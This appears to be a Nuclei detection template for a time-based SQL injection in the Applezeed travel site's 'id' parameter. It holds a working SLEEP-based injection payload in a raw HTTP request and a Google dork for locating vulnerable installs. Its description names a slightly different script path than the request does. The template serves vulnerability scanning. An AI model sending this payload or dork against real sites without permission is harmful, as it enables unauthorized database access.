32 lines
1.2 KiB
YAML
32 lines
1.2 KiB
YAML
id: applezeed-sqli
|
|
|
|
info:
|
|
name: Applezeed - SQL Injection
|
|
author: r3Y3r53
|
|
severity: high
|
|
description: |
|
|
Applezeed's 'travel-details.php?id=' URL with possible time-based SQL injection (SQLi) vulnerability allows attackers to manipulate the 'id' parameter, potentially causing delays in SQL queries and unauthorized retrieval of travel information from the database
|
|
reference:
|
|
- https://cxsecurity.com/issue/WLB-2019120057
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
google-query: intext:"Power BY applezeed.com"
|
|
tags: time-based-sqli,sqli,unauth,applezeed
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout: 15s
|
|
GET /travel-detail.php?id=1%27AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(6)))bAKL)%20AND%20%27vRxe%27=%27vRxe HTTP/2
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains(body, "applezeed")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
# digest: 4a0a004730450220017c35574e882a37b2983670d126f3cd07fee73e9f8aa3ed69465e07006275b6022100eb130639e37d26b6c7434583b3a21d65d118629236243234f5355245c2caf595:922c64590222798bb761d5b6d8e72950 |